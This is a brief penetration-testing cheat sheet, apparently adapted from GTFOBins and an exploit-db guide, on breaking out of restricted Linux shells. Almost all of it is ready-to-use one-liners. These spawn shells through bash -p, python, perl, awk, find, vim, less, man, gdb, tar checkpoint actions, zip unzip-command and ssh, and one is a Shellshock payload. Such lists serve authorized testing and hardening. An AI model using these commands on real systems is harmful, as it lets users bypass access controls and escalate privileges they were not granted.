Additional Resources: GTFOBins
Spawning
/bin/bash -p
/bin/sh
Copy
cp /bin/bash .
/bin/bash -p
cp /bin/sh .
/bin/sh
python
python -c 'import os; os.system("/bin/bash")'
python -c 'import os; os.system("/bin/sh")'
php
php -a
exec("bash -i");
exec("sh -i");
perl
perl -e 'exec "/bin/bash";'
perl -e 'exec "/bin/sh";'
ftp
ftp
!/bin/bash
!/bin/sh
gdb
gdb
!/bin/bash
!/bin/sh
man
man
!/bin/bash
!/bin/sh
more
more
!/bin/bash
!/bin/sh
less
less
!/bin/bash
!/bin/sh
vim
vi
!/bin/bash
!/bin/sh
vim
!/bin/bash
!/bin/sh
git
git help status
!/bin/bash
!/bin/sh
rvim
rvim
python import os; os.system("/bin/bash")
python import os; os.system("/bin/sh")
awk
awk 'BEGIN {system("/bin/bash")}'
awk 'BEGIN {system("/bin/sh")}'
find
find / -name test -exec /bin/bash \;
find / -name test -exec /bin/sh \;
nano
nano -s "/bin/bash"
- Type out “/bin/bash”
- Run Spell Check (^t)
pico
pico -s "/bin/bash"
- Type out “/bin/bash”
- Run Spell Check (^t)
zip
zip <zip>.zip <aFile> -T --unzip-command="sh -c /bin/bash"
tar
tar cf /dev/null <aFile> --checkpoint=1 --checkpoint-action=exec=/bin/bash
SSH
ssh <username>@<ip> -t "/bin/bash"
ssh <username>@<ip> -t "/bin/sh"
ssh <username>@<ip> -t "bash --noprofile"
ssh <username>@<ip> -t "() { :;}; /bin/bash"
#ShellShockssh -o ProxyCommand="sh -c /tmp/<file>.sh"
Source: https://www.exploit-db.com/docs/english/44592-linux-restricted-shell-bypass-guide.pdf